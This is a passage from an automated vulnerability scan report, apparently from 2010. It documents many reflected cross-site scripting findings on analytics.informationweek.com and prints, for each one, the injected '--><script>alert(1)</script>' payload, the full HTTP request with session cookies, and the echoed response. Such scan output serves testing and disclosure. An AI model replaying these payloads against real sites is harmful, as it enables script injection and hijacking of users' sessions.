HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:42:29 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:42:30 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 46059
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... t%3Ea52c545ddcc&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html910c8--><script>alert(1)</script>a52c545ddcc"> ...[SNIP]...
3.145. http://analytics.informationweek.com/menu/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 23c1b--><script>alert(1)</script>b70805851bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html?23c1b--><script>alert(1)</script>b70805851bd=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 70805851bd%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html?23c1b--><script>alert(1)</script>b70805851bd=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload ade54--><script>alert(1)</script>2eaa6cbd539 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menuade54--><script>alert(1)</script>2eaa6cbd539/83/It-business-strategy/It-business-strategy.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:05 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:05 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45947
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... Fmenuade54--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2eaa6cbd539%2F83%2FIt-business-strategy%2FIt-business-strategy.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menuade54--><script>alert(1)</script>2eaa6cbd539/83/It-business-strategy/It-business-strategy.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload ef59f--><script>alert(1)</script>55ce15d0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/83ef59f--><script>alert(1)</script>55ce15d0e/It-business-strategy/It-business-strategy.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:18 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:18 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45943
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... menu%2F83ef59f--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E55ce15d0e%2FIt-business-strategy%2FIt-business-strategy.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/83ef59f--><script>alert(1)</script>55ce15d0e/It-business-strategy/It-business-strategy.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 15d71--><script>alert(1)</script>c826d261e72 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/83/It-business-strategy15d71--><script>alert(1)</script>c826d261e72/It-business-strategy.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:33 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:33 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45947
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... -strategy15d71--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ec826d261e72%2FIt-business-strategy.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/83/It-business-strategy15d71--><script>alert(1)</script>c826d261e72/It-business-strategy.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 35fd4--><script>alert(1)</script>a2a7431dc34 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/83/It-business-strategy/It-business-strategy.html35fd4--><script>alert(1)</script>a2a7431dc34 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:42 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:42 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45947
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... rategy.html35fd4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea2a7431dc34&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/83/It-business-strategy/It-business-strategy.html35fd4--><script>alert(1)</script>a2a7431dc34"> ...[SNIP]...
3.150. http://analytics.informationweek.com/menu/83/It-business-strategy/It-business-strategy.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c61e7--><script>alert(1)</script>63f78dfcec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/83/It-business-strategy/It-business-strategy.html?c61e7--><script>alert(1)</script>63f78dfcec=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... html%3Fc61e7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E63f78dfcec%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/83/It-business-strategy/It-business-strategy.html?c61e7--><script>alert(1)</script>63f78dfcec=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 188e8--><script>alert(1)</script>80b08b924c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu188e8--><script>alert(1)</script>80b08b924c4/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:05 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:05 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 46013
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 281%29%3C%2Fscript%3E80b08b924c4%2F9%2FIp-telephony-and-unified-communications%2FIp-telephony-unified-communications.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu188e8--><script>alert(1)</script>80b08b924c4/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 9fa85--><script>alert(1)</script>58bbe578fd8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/99fa85--><script>alert(1)</script>58bbe578fd8/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:16 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:16 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 46013
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... t%281%29%3C%2Fscript%3E58bbe578fd8%2FIp-telephony-and-unified-communications%2FIp-telephony-unified-communications.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/99fa85--><script>alert(1)</script>58bbe578fd8/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload ab4da--><script>alert(1)</script>4ac269aa3be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/9/Ip-telephony-and-unified-communicationsab4da--><script>alert(1)</script>4ac269aa3be/Ip-telephony-unified-communications.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:31 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 46013
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ert%281%29%3C%2Fscript%3E4ac269aa3be%2FIp-telephony-unified-communications.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/9/Ip-telephony-and-unified-communicationsab4da--><script>alert(1)</script>4ac269aa3be/Ip-telephony-unified-communications.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 7cc6f--><script>alert(1)</script>0701dc420db was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html7cc6f--><script>alert(1)</script>0701dc420db HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:46 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:46 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 46013
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... alert%281%29%3C%2Fscript%3E0701dc420db&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html7cc6f--><script>alert(1)</script>0701dc420db"> ...[SNIP]...
3.155. http://analytics.informationweek.com/menu/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 363e9--><script>alert(1)</script>f02ab6e7b3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html?363e9--><script>alert(1)</script>f02ab6e7b3c=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %281%29%3C%2Fscript%3Ef02ab6e7b3c%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html?363e9--><script>alert(1)</script>f02ab6e7b3c=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload a1e0a--><script>alert(1)</script>12e4c7ebdff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /offera1e0a--><script>alert(1)</script>12e4c7ebdff HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:39:19 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:39:19 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45843
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... n?service=http%3A%2F%2Fanalytics.informationweek.com%2Foffera1e0a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E12e4c7ebdff&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/offera1e0a--><script>alert(1)</script>12e4c7ebdff"> ...[SNIP]...
3.157. http://analytics.informationweek.com/offer [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/offer
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a0787--><script>alert(1)</script>483669447d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /offer?a0787--><script>alert(1)</script>483669447d=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ce=http%3A%2F%2Fanalytics.informationweek.com%2Foffer%3Fa0787--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E483669447d%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/offer?a0787--><script>alert(1)</script>483669447d=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 5b3b7--><script>alert(1)</script>d925b8418cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /profile5b3b7--><script>alert(1)</script>d925b8418cb/registration-step1.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:39:26 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:39:26 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45897
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cs.informationweek.com%2Fprofile5b3b7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed925b8418cb%2Fregistration-step1.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/profile5b3b7--><script>alert(1)</script>d925b8418cb/registration-step1.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload cb96a--><script>alert(1)</script>fac2d3fc4b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
